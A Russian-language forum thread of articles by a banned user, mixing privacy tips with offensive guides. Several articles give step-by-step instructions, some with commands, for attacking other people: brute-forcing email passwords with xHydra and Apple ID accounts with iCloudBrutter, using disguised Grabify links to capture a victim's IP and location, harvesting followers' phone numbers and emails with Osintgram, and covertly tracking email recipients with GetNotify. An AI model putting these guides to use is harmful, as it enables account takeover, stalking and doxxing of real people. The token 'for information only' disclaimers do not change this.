К холодному способу хранения относятся аппаратные кошельки, например Ledger и Trezor, но их главный минус - это цена. Не все готовы платить по 15000 тысяч рублей, поэтому обычный USB-накопитель может стать достойной альтернативой.​
Почему Linux

В отличие от Windows, Linux имеет более продуманную систему безопасности. В Windows то и дело встречаются шпионское модули, вирусы, кейлогеры, а на сервера Microsoft пересылаются скриншоты, которые вы никак не можете отключить. Если вы точно хотите обеспечить себе максимальную анонимность, то обязательно устанавливайте холодный кошелёк на Linux.​
Почему Tails

Tails является дистрибутивом Linux и по умолчанию использует сеть Tor. Помимо этого, там уже установлен кошелек Electrum, который нам и потребуется для работы.​
Что нам понадобится


  • два USB-накопителя;
  • Скаченный дистрибутив Tails (Скачивайте с официального сайта);
  • Программа Rufus для записи Linux на USB (не используйте другие программы для записи Linux, только Rufus).
Установка

Итак, на первую флешку загружаем Tails и затем вставляем вторую.
Заходим в меню и выбираем Tails Installer.
13841d8a206e949528dfd663cb6d5acf.jpg


Выберите клонирование Tails и загрузите на вторую флешку.

83ec16e3c311c57c915dfa304b05434a.jpg


Создание USB с Tails для хранения данных

Если вы просто запишите Tails на USB, то вы не сможете хранить вашу личную информацию. Для этого нам и нужен второй USB-накопитель.

  • Откройте меню и нажмите Configure persistent volume (Настройка хранилища данных)
e6dc4be8f48848eb83888ea483125b2e.jpg


С помощью бегунка выберите те данные, которые вам понадобятся.

2ea45a27ce7d773eb45b2bd857bffa0d.jpg


Создание ключей и настройка Electrum

Прежде всего, кошельку необходимо присвоить имя. Если у вас есть стандартный кошелек с двухфакторной аутентификацией, мультиподписью или предварительно подготовленный кошелек, вы можете импортировать его.

  • Мы же будем создавать стандартный кошелек.
1fcfceef1deea3e94c4a7c856f2195f5.png


5014c9c4dc1fe26b4d1b76cae2406b96.png



  • Создадим новый сид. Это алгоритм, который генерирует список из 12 слов — закрытый ключ. Слова необходимо записать по порядку, хранить в надежном месте и никому никогда не сообщать.
4c3afbc9333b4f830a61d329ad59fa02.png



e2fc28dca9ed822aa45910dc93b396bf.png


Теперь введём данные слова по порядку, после чего будет запрошен пароль для повторного шифрования кошелька.

9653661e26ec478e5f4ae0226af87232.png



  • Чтобы посмотреть публичный ключ и другую информацию о кошельке, зайдите во вкладку Информация о кошельке.
213515e1ff9d69774807684f3e3ab13d.png


Ваш кошелёк Electrum готов. Для других криптовалют необходимо использовать разные кошельки, которые вы таким же способом можете скачивать и устанавливать в систему.
Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как взломать почту

a3389eb46882b2190e03817600bbb932.jpg




Вступить в наш чат
В наши дни почта - это не просто самостоятельный инструмент, а скорее ключевое звено, которое даёт доступ ко всем сервисам, социальным сетям и многому другому. Взломав почту, вы получите доступ ко всему. ​​В сегодняшней статье мы поговорим про отнюдь не новый, но действенный способ взлома паролей. Он является универсальным и может быть применён ко всем почтовым сервисам. Речь пойдет про Hydra в Kali Linux.

1a6deb54a7d0cc2089a060e84fd15dfa.jpg


xHydra - это многозадачный брутфорсер паролей с открытым исходным кодом, с помощью которого мы подберем пароль для одной тестовой почты. Это бесплатное приложение, которое можно скачать с GitHub. Но если вы знакомы с Kali Linux, то вам известно, что hydra является встроенным инструментом, поэтому установку выполнять не нужно.
Взлом почты

1. Запускаем графическую оболочку скрипта xhydra.

2. В новом окне, во вкладке «Target» прописываем в строке «Single Target» адрес smtp-сервера исходящей почты нужного сервиса. Порт 465 и протокол выбираем соответственно SMTP. Ставим галочку использовать SSL-соединение. И отмечаем пункт, отвечающий за отображение результатов брутфорса в реальном времени.


2470b7180b95c903de6e95a089e5e81b.png


3. В соседней вкладке «Password» указываем почту, которую будем брутфорсить. В пункте Password указываем путь к словарю. Найти словари для брутфорса можно в любом поисковике. Также ставим отметку, отвечающую за проверку логина в качестве возможного пароля.

360e3c8da059f8c7715153aece12563f.png


4. В «Tuning»меняем метод на HTTP.

5. Во вкладке «Specific» пишем полной адрес почтового сервиса, где находится наш ящик.


238b53966c30474137b028588967f5a1.png

6. Жмём на «Start». Перебор паролей запущен. Если брут успешный, то программа выдаст сообщение о том, что пароль подобран, как в нашем случае.


f0a60c943e6751f5e4c279ccd33b7af1.png


А ваша почта надёжно защищена?
Информация в этой статье предоставлена в ознакомительных целях. Мы не призываем к действию.


 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Удаляем метаданные

20c387f0dc063473cb019d6fe97d2898.jpg



Вступить в наш чат
Метаданные — данные, относящиеся к дополнительной информации о содержимом или объекте. Метаданные раскрывают сведения о признаках и свойствах, позволяющие автоматически искать и управлять ими в больших информационных потоках.​
Как работают метаданные

Например, вы хотите скинуть фото на форум. Однако помимо фото, интернет получит много интересной информации о вас: когда был сделан снимок, а также данные GPS, по которым без труда можно вычислить местоположение. Особенно интересно, если фото было сделано из вашего дома.


2b1270ba884292242c60e11e8338f0f3.png



Как вы понимаете, метаданные содержат огромное множество информации о вас. Для того, чтобы обеспечить свою безопасность и оставаться анонимным в сети, необходимо удалять метаданные. В этой статье разберём способ их удаления.


d6ea2ba35d9297bf22b06fb7fa197fdf.png



Как удалить метаданные

Проще всего: скачать специальное приложение. Таких приложений становится всё больше. В этой статье разберём одно из самых популярных — Metadata Cleaner.
Metadata Cleaner позволяет просматривать метаданные в ваших файлах и удалять их. Устанавливаем приложение, интерфейс интуитивно понятен.

  1. Добавляем файлы
5a74b6130038254c689ca9f924d5c452.png



2. Приложение позволяет просматривать, какие метаданные содержит файл.


adb62dbba3b33fead92c304e902b1d24.png



3. Удаляем метаданные. Можно сразу у всех файлов.


ce43a5f0922c2c526c4420514a6e271e.png
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
1153ae5a4f5a82ac79a1f43daab40f16.jpg



Вступить в наш чат
Согласно CNBC, в 2021 году в Метавселенной было продано недвижимости на $501 млн, а в 2022 году продажи превысили $85 млн. При таком дальнейшем спросе они превысят $1 млд к концу года. Это лишний раз доказывает, что Метавселенная находится на пике популярности, вместе с этим она развивается и появляются новые тренды, такие как Интернет тела и взламываемые люди.​
Всего пару лет назад основатель ВЭФ К. Шваб заявил, что благодаря Метавселенной человек сможет достичь слияния на физическом, биологическом и цифровом уровне. А в прошлом году Марк Цукерберг сказал, что в скором времени нейроинтерфейсы станут обязательной частью взаимодействия человека с Метавселенной, появятся новые устройства, позволяющие полностью погрузится в процесс и сделать его более живым и естественным.



4c175f2244b01bd026b718dc7309d81a.jpg



Интернет тела


Речь идёт о «Интернет телах» (IoB) - это технология, которая позволяет совершать действия при помощи мыслей, памяти. Интернет тела способны объединить тело человека с датчиками, которые передают информацию по сетям. Они включают в себя медицинские и биометрические данные.
Нейронные интерфейсы будут очень важной частью AR-очков, или EMG-вход от мыши на запястье будет сочетаться с ИИ.
Благодаря Интернет телу человеку откроются огромные возможности, которые помогут полностью погрузится в цифровое пространство. За счёт накопления биометрических данных в Метавселенных через какое-то время можно будет взламывать и программировать человеческое тело.
Хакинг людей в Метавселенной

Еще в 2020 году историк Юваль Харари отметил, что человек больше не является загадкой природы, он становится животном, которого можно взломать. И для того, чтобы хакнуть человека нужно завладеть только его биологическими данными и соответствующей вычислительной мощностью.
Харари представил формулу, которая может послужить основой для будущего взламывания человека. Вот эта формула — B x C x D = A**. Она означает, что биологические знания, умноженные на вычислительную мощность, умноженную на данные, равны способности взламывать людей. Харари уверен, в скором времени правительство и компании начнут взламывать население, так как уже имеют большую базу данных о каждом из нас. И в этом процессе Метавселенные могут стать тем самым инструментом для хакинга. Чем больше людей подключатся к Метавселенным, тем больше информации можно собрать. А чем больше устройств, тем больше возможностей открываются для тех, кто собирает и управляет ими.
Время Интернет тел и взламывания уже наступило. Бесчисленное количество устройств собирает данные о пользователях. Например, медицинские учреждения, они хранят огромные базы данных о состоянии здоровья пациентов. Клиники уже сталкиваются с попытками взлома и похищения информации. Нет никаких гарантий, что хакеры могут работать на правительства разных стран, которым нужен доступ к таким базам данным.
Учитывая тот факт, что уже некоторые клиники открывают офисы в Метавселенных, количество поступаемой информации о клиентах вырастет в разы. Они могут быть использованы в самых разных целях, в том числе и для хакинга.
При слиянии на биологическом, цифровом и физическом уровне, навигация по Метавселенной потребует от каждого обладать личным аватаром, чтобы войти в систему. Контроль за ним будет осуществлять система, а не сам человек.


Заключение

Метавселенные дают уникальные возможности для творчества, работы, развлечений. Однако, они же и собирают о пользователях множество данных, которые могут быть использованы против самого человека.



 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
f007ba127e66d2af08056ce791b3471e.jpg
Вступить в наш чат
Если вы хотите отследить чьё-то местоположение, собрать данные о пользователе, то это статья для вас. Сегодня мы покажем вам, как это можно провернуть с помощью простой ссылки.​
Для того, чтобы создать шпионскую ссылку, мы будем использовать сайт Grabify. Перейдя по ней, сайт автоматически соберет о жертве личные данные, в том числе и IP.


630cbdce7080012a0ce6838b9ea903d0.png






Самое важное в этом деле - выбрать правдоподобную ссылку, по которой человек точно захочет перейти. Это может быть видео с ютуба или мемная картинка, нет никаких ограничений. Какую ссылку вы выберете, зависит от вас. Вам лишь нужно подобрать что-то убедительное и подходящее к конкретной ситуации.​
Создание шпионской ссылки

Шаг 1 - Подготовка

Откройте веб-браузер и перейдите на сайт grabify.link.
Этот сайт бесплатный, поэтому платить ни за что не нужно.​
Шаг 2 - Создаем учетную запись Grabify

Создайте учетную запись на Grabify. Вы также можете использовать временную почту, если хотите. Пройдите регистрацию и подтвердите ее в сообщении, отправленном по почте.





a7d4fa50b1c25734bccdb1aebe2041d1.jpg







После того, как вошли в учётную запись, вы должны увидеть страницу, как показано ниже.


657b37cd167de900b8366ca478bc9e93.jpg



Шаг 3 - Создаём URL для отслеживания

47a2b494ea74c40fa6c50899b77b032a.jpg





В начале статьи мы попросили вас хорошенько подумать насчёт убедительной ссылки, по которой жертва 100% захочет перейти. Будьте креативными.
Примечание: это должно быть что-то простое и не должно вызывать подозрений.​
Помимо этого, обязательно выберите опцию «Smart Logger», это поможет собрать еще больше информации о пользователе.


1f900557ee50ed9bb0200b4438ed438b.jpg



Шаг 4 - Скрываем ссылку для отслеживания

Название Grabify в имени URL-адреса может показаться подозрительным, поэтому убедитесь, что вы используете функцию сокращения. Вы можете использовать ссылку с любым количеством сокращателей URL, которые доступны прямо в Grabify, как показано ниже.


598bbaa061c5686933e3d450e218d380.jpg





Если сокращатели по умолчанию не соответствуют вашим потребностям, вы всегда можете создать собственную ссылку с помощью пользовательской панели ссылок, как показано ниже.


9b29ab12c1b46067e3364b8849881f3e.jpg



Нажмите либо на «Click here», либо на «Change domain/Make a custom link» в поле «New URL». Теперь проверьте параметры «Extension» в открывшемся меню.


7f223cb8d09afac8445cbef4811d1c7e.jpg



Шаг 5 - Отправляем ссылку

Есть много вариантов, как это можно сделать. Самый распространенный — отправить ссылку в социальных сетях или мессенджерах. Используйте социальную инженерию, чтобы убедить человека нажать на неё.
Как только цель нажимает на ссылку, вы получаете информацию о IP-адресе и другие личные данные, такие как дата и время, местоположение, информация о батарее, язык, часовой пояс, разрешение экрана, браузер, интернет-провайдер и операционная система.


Поздравляем, вы успешно научились отслеживать чье-либо местоположение с помощью одной лишь ссылки. Успехов!​

 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
iCloudBrutter: как взломать учетную запись Apple ID

cfcf24c82f48e603ebfef11b7e7ac011.jpg



Вступить в наш чат
Apple — крупнейшая компания, спускающая миллиарды долларов на защиту и конфиденциальность своих устройств. Однако, времена изменились, и поэтому яблочные устройства все чаще подвергаются хакерским атакам. Так, ещё в 2019 году Google’s Project Zero сообщили о массовых взломах Apple устройств: для этого были использованы вредоносные сайты, перейдя по которым, устройство взламывалось. В сегодняшней статье мы расскажем вам, как хакнуть Apple ID, и как пользователям яблок защититься от взломов.

f13424ee8ba7b3539c1f5cea35e3989a.jpg


Что такое Apple ID

Apple ID представляет из себя учетную запись, которая даёт доступ ко всем функция Apple. По сути, это центр управления всем устройством, который позволяет вам удаленно управлять IPhone, загружать и обновлять программное обеспечение, создавать резервные копии данных, искать и блокировать устройство и многое другое.


Как взломать Apple ID

Для того, чтобы хакнуть Apple ID, мы будем использовать инструмент iCloudBrutter. Это простой скрипт Python для выполнения атаки методом перебора паролей.
Вся информация предоставлена в ознакомительных целях. Мы не несём ответственности за ваши действия.​
Итак, начнём:

  • Клонируйте инструмент iCloudBrutter с помощью команды git-clone:
git clone https://github.com/m4ll0k/iCloudBrutter.git
  • Теперь также измените каталог на icloudbuster:
cd iCloudBrutter
  • Чтобы использовать этот инструмент, вам также необходимо установить следующее:
pip3 install requests, urllib3, socks
  • Если pip3 не установлен, используйте следующую команду для его установки:
sudo apt-get install python3 python3-pip php ssh git
  • Теперь, чтобы запустить инструмент и начать взламывать учетные записи Apple ID, введите следующее:
python3 icloud.
8a17021fa4fce2befe04677611c2a97d.jpg



  • Далее пишем последнюю команду:
python3 icloud.py --idw /root/Desktop/Apple.txt --wordlist /root/Desktop/pass.txt

a6846038d6c4969c3742710c3ae7bd2c.jpg


Здесь apple.txt содержит учётные записи Apple, а pass.txt — список часто используемых паролей и тех, которые сливаются в сеть хакерами. Вы легко можете найти и скачать такие списки в Интернете, просто введите запрос: «passwords for bruteforce».


Вывод


Метод взлома с помощью брутфорса не является 100% рабочим, так как успех будет гарантирован лишь в том случае, когда пользователь установит слабый пароль. Подводя итог, хотелось бы отметить, что единственной защитой от взломов неизменно остаётся надёжный пароль. Именно уникальный и сильный пароль - это гарант безопасности ваших личный данных. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как пользоваться навигатором, когда нет интернета

2c0f44836fc73dad0af538a5c2f83226.jpg



Вступить в наш чат


Согласно общепринятому мнению, лучший способ навигации — Google Карты, однако, и они полны недостатков. Из самых очевидных можно выделить невозможность пользоваться приложением без доступа к интернету и слежка за пользователями. Рассмотрим, какие есть варианты безопасных и работающих в режиме офлайн карт.
Приложение MAPS.ME

Сервис MAPS.ME отлично справляется с этой задачей. Настоящее картографическое приложение, как для путешественников, так и для обычных пользователей.
Идеально подходит для пешеходов: разметка тропинок и маршрутов, которые зачастую игнорируются Google Картами, в которых большинство парковых зон выглядит как одно большое зелёное пятно.
В постоянном подключении к интернету нет необходимости — карта вашего региона скачивается разово при первой же возможности, после чего вы можете пользоваться ей, когда будет необходимо.


fa14a973155da2fa32f29a9ceb480850.png



Как начать пользоваться сервисом

Скачиваем приложение с официального сайта:


7312636e56e879bef1965b0be7cecc83.png



Доступно для IOS и Android.
Сервис имеет удобную навигацию по картам: отмеченные здания поделены на группы (рестораны, отели и т.д.), также есть история поиска.


7c3fc44e7c83e186c450a854c6c37c5b.png



Пользоваться картами можно и с компьютера на том же сайте. Функционал тот же:


dff3a3c9072dd6eea0413dba5d6f6e9b.png



Безусловно главный плюс приложения: возможность скачать карту любого региона офлайн. Кроме этого, сервис не отслеживает ваши действия и локацию, как это делает тот же Гугл.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Топ-5 лучших операционных систем для хакеров

e6d6209f286d31cea2c4f6b7dd01657d.jpg



Вступить в наш чат
Что обычному человеку хорошо, то хакеру –– смерть. Очевидно, что требования разных пользователей к компьютеру сильно разнятся. Но самое сильное отличие - это операционная система. Большинство хакеров скептически относятся к Windows поскольку считают ее медленной, неудобной и совсем небезопасной по сравнению с другими системами. И именно поэтому, мы подготовили для вас наш топ-5 лучших ОС для хакеров.​
1. Kali Linux

Kali Linux — это программное обеспечение с открытым исходным кодом, которое доступно абсолютно бесплатно. Хакеры отдают предпочтение этой ОС, потому что она имеет более 600 инструментов тестирования проникновения и большое количество поддерживаемых языков. Поскольку это программное обеспечение с открытым исходным кодом, весь его код доступен на GitHub для настройки. Некоторые функции Kali Linux: Wifite2, Nessus, Aircrack-ng, Netcat, инструменты судебной экспертизы, NetHunter и многие другие.


2. BackBox

15b8c23a38549193caa45d4b90c4cf59.jpg



BackBox — это проект сообщества с открытым исходным кодом, который продвигает культуру безопасности в ИТ-среде и делает ее лучше и безопаснее. Это дистрибутив Linux для тестирования на проникновение на основе Ubuntu. Многие хакеры предпочитают BackBox любой другой ОС, потому что в ней есть инструменты безопасности для самых разных целей, таких как анализ сети, анализ веб-приложений, компьютерный криминалистический анализ, оценка уязвимостей и т. д.


3. Parrot Security OS

ed8b5e7a32d2ef0c4f2668c7a066478f.jpg



Parrot OS — это продукт Parrot Security, дистрибутив GNU/Linux, основанный на Debian. Эта операционная система предназначена для обеспечения безопасности и конфиденциальности. Хакеры любят работать с Parrot ОС из-за ее полного переносимого арсенала услуг ИТ-безопасности и цифровой криминалистики. Parrot поддерживает платформы Anosurf, FALON 1.0, Qt5, .NET/mono, LUKS, Truecrypt и VeraCrypt. Также у Parrot OS есть интересные функции, такие как полная анонимность, криптография, песочница, программирование и разработка, аппаратный взлом и т.д.


4.DEFT Linux

41391cb0fa5a4fd229ca08cf8a729eed.jpg



DEFT — это бесплатное программное обеспечение с открытым исходным кодом, разработанное на платформе Linux Ubuntu и оснащенное удобным графическим интерфейсом. В продукт добавлен набор профильных утилит, начиная антивирусами, системами поиска информации в кэше браузера, сетевыми сканерами и другими различными утилитами, заканчивая инструментами, которые необходимы при проведении поиска скрытой информации на диске. Предназначен для компьютерной криминалистики и информационной безопасности.
5. Samurai Web Testing Framework

a39b01fbb2660451b66b31f3d084df48.jpg



Samurai Web Testing Framework — это операционная система для хакеров, которая имеет лучшие инструменты для тестирования и атаки веб-сайтов. Имеет открытый исходный код, предоставляется бесплатно. Особенности Samurai WTF заключаются в том, что он оснащен SVN и имеет инструменты WebApp Pentest: Burpsuite, SQLMap другие. В качестве основы использует Ubuntu.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как восстановить удаленную историю браузера и файлы на компьютере



6701861d5d93cc8833c3ba524298a9d3.jpg



Вступить в наш чат
Наверняка, вы ни раз стирали историю браузера, а вместе с этим удаляли что-то важное. Или же хотели пошпионить за кем-то, узнав, какие сайты и страницы посещает человек. А, возможно, вы случайно удалили файл, и теперь думаете, что он безвозвратно потерян. Но это не так — у нас есть решение! Обычно, стирая историю или файл со своего внутреннего или внешнего диска, вы не удаляете их реальное содержимое; скорее, пространство, которое они занимали.​
И сегодня мы расскажем вам о 3 способах, как восстановить историю браузера и случайно удалённые файлы с ПК.


99cfe9562fa30bcfde820a7978d8b11e.png



Способ 1: использование командной строки и кэша DNS в Windows

Это немного технический метод, который дает нам имена всех доменов, которые мы посетили. Обратите внимание, что домены и скрипты, загруженные из рекламы, также будут показываться. Таким образом, вы можете получить кучу доменов.

  • Откройте командную строку или CMD с помощью панели поиска Windows.
0491f84be871bfb349034bc07d48189f.jpg



Теперь в командной строке введите команду ipconfig /displaydns, как показано на изображении ниже, и нажмите Enter.


068f68215d4a01fd4e39f3a9e4788289.jpg




  • Теперь вы можете увидеть все посещённые домены, однако нельзя посмотреть более подробную информацию о странице, только название конкретного сайта.\
e4cc0ab1ad40ce967615c533fac16687.jpg



Способ 2: восстановление истории и файлов с помощью программы Recuva

Помимо вышеописанного способа, вы всегда можете использовать специальную программу, такую как Recuva. Она является бесплатной и поможет восстановить потерянные данные.
Скачайте программу и установите на свой компьютер.



56e6567c07c4ca4d20fadc189fc3719e.jpg



Далее выберите какие файлы вы хотите восстановить.


2c3aa22d70165201b1afba4282c96eb7.jpg



Файлы истории Google Chrome обычно хранятся по этому пути по умолчанию: C:\Users\Username\AppData\Local\Google\Chrome\User Data\Default.
Укажите любой другой диск, на котором будет производиться поиск потерянных файлов. Программа выполнит первичное сканирование, в результате которого покажет вам в удобной форме все недавно удаленные файлы, которые подлежат восстановлению.



777d45c2c7ae1a94759ddaf0b8282a77.jpg



В меню параметров вы можете легко отфильтровать список, пропуская файлы весом ноль байт или скрытые документы.
Если результаты покажут файл с красным кругом, то восстановление невозможно; если же вы видите зеленый круг, то вы сможете восстановить данные почти с полной уверенностью. Оранжевый круг означает вероятность 50%.


d1e8b9024ad66217c1e71055c9eaeae2.jpg



Способ 3: восстановление системы

Этот метод следует использовать только в крайнем случае, поскольку он откатит систему назад.
Перейдите в строку поиска и введите восстановление системы.
Выберите данную опцию, и вы увидите все точки восстановления на вашем устройстве.


c2dbedd491fbd2acca6d3a5423a93fc6.jpg



Щелкните нужную точку восстановления и подтвердите. После согласия, все изменения, сделанные после этой точки восстановления, будут отменены, и ваши данные будут восстановлены.


457d0f8201f5fcdde6af5b4bb0ad5cd1.jpg
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Деанон в Instagram с Osintgram

a268ea29fb8f6015b7a7b359ce90c04c.jpg


Вступить в наш чат

В сегодняшней статье мы расскажем вам как пробить пользователя Инстаграм с помощью одной лишь утилиты. Вы узнаете как выжать максимум полезной информации из профиля жертвы, зная только никнейм. Итак, начнём.

231f760a836bf982b19ebb27c3313982.jpg


Мы не призываем вас к каким-либо действиям, статья написана исключительно в ознакомительных целях.

Что нужно для работы:

Программа, скачиваем на GitHub;
Python3 версии 3.6+;
Аккаунт инстаграма.

Osintgram

А поможет нам в этом утилита Osintgram. Это инструмент OSINT, позволяющий быстро собрать все данные о конкретной странице.

После скачивания приступим к установке, для этого введите команды:

git clone https://github.com/Datalux/Osintgram.git
cd Osintgram
pip install -r requirements.txt

Перед запуском утилиты вам потребуется создать и добавить аккаунт. Это нужно сделать в файле credentials.ini, который лежит в каталоге config, в папке с программой. Вводим логин и пароль своего аккаунта и сохраняем.

Не забудьте о своей безопасности, используйте левый профиль.

772f78db79a2793321945d29555c815a.jpg


Далее можно приступить к использованию Osingram. Для начала давайте откроем справку:

python3 main.py -h

e06027fd1a2889c1c8d8e4c1f7d2eb43.jpg


использование: main.py [-h] [-C] [-j] [-f] [-c COMMAND] [-o OUTPUT] id

Osintgram - это инструмент OSINT в Instagram. Он предлагает интерактивную оболочку для выполнения анализа аккаунта Instagram любого пользователя по его нику.

обязательные аргументы:
id имя пользователя

необязательные аргументы:
-h, --help показать это сообщение и выйти
-C, --cookies очистить предыдущие cookies
-j, --json сохранить результат в файл JSON
-f, --file сохранить результат в файл
-c COMMAND, --command COMMAND
запустить в однокомандном режиме и выполнить предоставленную команду
-o OUTPUT, --output OUTPUT
где хранить фотографии

Исходя из информации выше, нам нужно ввести только имя интересующего пользователя.

Так и делаем:

python3 main.py nickname

67181b7c26bd1aab941a5b0c70bbe7b0.jpg


После успешного логина, видим список команд для сохранения результатов и приглашение к вводу. Чтобы увидеть команды для анализа профиля вводим: list

e12031bdead5c4a0be45735236378f6a.jpg


Команды для Osintgram

Ниже представлен список команд, которые может выполнить утилита.

addrs - cобрать все адреса из фотографий цели (отметки мест в инсте);

captions - собрать все подписи к фотографиям цели;

comments - получить количество комментариев ко всем постам цели;

followers - собрать всех подписчиков цели;

followings - собрать всех, на кого цель подписана;

fwersemail - собрать email адреса подписчиков;

fwingsemail - собрать email адреса страниц, на которых подписана цель;

fwersnumber - собрать телефоны подписчиков;

fwingsnumber - собрать телефоны страниц, на которых подписана цель;

hashtags - собрать все хештеги, используемые целевой страницей;

info - собрать общую информацию о странице;

likes - получить суммарное количество лайков на странице;

mediatype - собрать посты по их типу (фото или видео);

photodes - собрать описания фотографий цели;

photos - скачать все фотографии с целевой страницы;

propic - скачать фотографии профиля целевой страницы;

stories - скачать все доступные сторис страницы;

tagged - собрать всех пользователей, упомянутых на странице по юзернейму;

wcommented - собрать всех пользователей, оставлявших комментарии на странице;

wtagged - собрать всех пользователей, кто упоминал страницу.

Трудно не заметить большие возможности Osintgram. Но для начала давайте узнаем общие данные о нашей цели. Вводим команду: info


2d9666513fce7deb299f985542eb78ac.jpg


И уже видим полезную информацию. Но этого мало, поэтому предлагаем узнать номера телефонов пользователей, на которых подписана жертва.

Вводим: fwingsnumber. И Osintgram спросит хотим ли мы получить все возможные телефоны? Мы ограничимся лишь 10 для примера.

a9fa3fcaef9b3732d0e093c4c6798d3a.jpg


И мы видим конкретный результат. Теперь проделываем тоже самое, но только с электронными почтами.

Вводим: fwingsemail

cdefd364114d8e3a3533b236a9375501.jpg


И здесь Osintgram показал удовлетворительный результат. Остальные команды работают по аналогичному принципу. Ну а что, где и когда применять — решать вам.

Стоит также отметить, что результат мы можем сохранять в txt файл. Для этого перед запуском команд введите FILE=y.

Что касается закрытых аккаунтов, то тут программа пока бессильна. Для того, чтобы разведка сработала, вам заранее нужно заполучить подписку нашей цели, в значит включить в ход навыки социальной инженерии. На этом все. Удачи!
 
Последнее редактирование:
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как пробить человека, зная только Email


cc0751d1212b554b36539bdaa233cae7.jpg



Вступить в наш чат

Пробив данных раньше был чем-то вроде привилегии — доступен только узкому кругу лиц. Многие до сих пор думают, что для этого нужны какие-то супер секретные программы, которых нет в открытом доступе.

Этой статьей разрушаем мифы, а также рассказываем об одном из самых простых способов пробива.
Сервис GetNotify

К сожалению или к счастью, в Интернете есть всё. Пользователь, однажды сюда попавший оставляет свой след, порой подробный настолько, что его без труда может отыскать каждый.

62da338742ce3eeac6ae17a5609718d9.png


С помощью этого способа можно получить доступ к самой интересной информации: местоположение, IP-адрес и время у интересующего человека. Сервис уже хорошо знаком западным пользователям, но в руки к СНГ комьюнити попал не так давно.

Чтобы собрать необходимую информацию, отлично подходит сервис GetNotify. Он позиционирует себя как бесплатный инструмент для слежки, для которого требуется лишь адрес электронной почты.

Ежедневно тысячи пользователей получают и отправляют письма по электронной почте. GetNotify.com — это бесплатная служба отслеживания Email, которая уведомляет клиента, когда отправленное письмо прочитано.

Более того, сервис утверждает, что их техника отслеживания электронной почты невидима для получателя, что обеспечивает полную анонимность и развязывает руки для слежки.
Как это работает

Сервис добавляет в сообщение небольшое невидимое изображение, которое выполняет функцию трекера. И как только получатель откроет такое письмо, то детективу, решившему опробовать сервис, сразу придет уведомление о прочтении.

Однако, на этом чудеса не заканчиваются. GetNotify по доброте душевной щедро поделится и другой более полезной информацией, которую ему удалось раздобыть:

IP-адрес получателя
географическое местоположение
часовой пояс
операционная система
используемый браузер

9478cdc1d64e06ee4433c5dbe9ad2675.png


Важно, что сервис предоставляет такие услуги бесплатно. Чтобы начать слежку, достаточно зарегистрироваться на сайте и ввести Email жертвы. Всё остальное сервис выполнит сам.
 
Последнее редактирование:
Назад
Сверху